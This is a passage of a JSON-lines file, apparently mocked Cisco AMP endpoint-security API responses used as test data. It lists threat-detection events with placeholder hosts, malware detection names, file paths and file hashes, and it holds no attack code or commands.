Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055308135989259","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055299546055000,"timestamp":1610705037,"timestamp_nanoseconds":400000000,"date":"2021-01-15T10:03:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055299546054666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055299546055000,"timestamp":1610705037,"timestamp_nanoseconds":354000000,"date":"2021-01-15T10:03:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055299546054665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255523898262000,"timestamp":1610705029,"timestamp_nanoseconds":26000000,"date":"2021-01-15T10:03:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255523898261522","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055260891349000,"timestamp":1610705028,"timestamp_nanoseconds":744000000,"date":"2021-01-15T10:03:48+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055260891349000","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055248006447000,"timestamp":1610705025,"timestamp_nanoseconds":103000000,"date":"2021-01-15T10:03:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055248006447111","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1j4","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s1j4","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055239416513000,"timestamp":1610705023,"timestamp_nanoseconds":119000000,"date":"2021-01-15T10:03:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055239416512518","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055239416513000,"timestamp":1610705023,"timestamp_nanoseconds":72000000,"date":"2021-01-15T10:03:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055239416512517","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055222236643000,"timestamp":1610705019,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:03:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055222236643332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1uc","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s1uc","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055217941676000,"timestamp":1610705018,"timestamp_nanoseconds":243000000,"date":"2021-01-15T10:03:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055217941676035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255468063687000,"timestamp":1610705016,"timestamp_nanoseconds":920000000,"date":"2021-01-15T10:03:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255468063686673","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255420819046000,"timestamp":1610705005,"timestamp_nanoseconds":829000000,"date":"2021-01-15T10:03:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255420819046416","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395959000600,"timestamp":1610704997,"timestamp_nanoseconds":959000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"Win32.DemoMal.Rat.Client","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704997,"start_date":"2021-01-15T10:03:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900"},"parent":{"disposition":"Malicious","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055127747363000,"timestamp":1610704997,"timestamp_nanoseconds":930000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055127747362818","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055127747363000,"timestamp":1610704997,"timestamp_nanoseconds":930000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055127747362817","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906501425758000,"timestamp":1610704994,"timestamp_nanoseconds":771000000,"date":"2021-01-15T10:03:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906501425758211","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\VirusMap\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":3168,"disposition":"Clean","file_name":"mcvsmap.exe","identity":{"sha256":"ae16e10e621d6610a3f7f2c7122f9d1263700ba02d1b90e42798decb2fe84096","sha1":"9224de3af2a246011c6294f64f27206d165317ba","md5":"4e1e0b8b0673937415599bf2f24c44ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255369279439000,"timestamp":1610704993,"timestamp_nanoseconds":270000000,"date":"2021-01-15T10:03:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255369279438863","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906497130791000,"timestamp":1610704993,"timestamp_nanoseconds":662000000,"date":"2021-01-15T10:03:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906497130790914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Local Settings\\Temp\\RarSFX0\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":428,"disposition":"Malicious","file_name":"ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395608001000,"timestamp":1610704992,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:03:12+00:00","event_type":"Adobe Reader compromise","event_type_id":1107296261,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704992,"start_date":"2021-01-15T10:03:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a"},"parent":{"disposition":"Clean","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266559459951000,"timestamp":1610704979,"timestamp_nanoseconds":950000000,"date":"2021-01-15T10:02:59+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5832266559459950593","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":25939,"local_ip":"10.10.0.0","local_port":15322,"nfm":{"direction":"Outgoing connection from","protocol":"UDP"},"parent":{"process_id":1512,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":701000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat 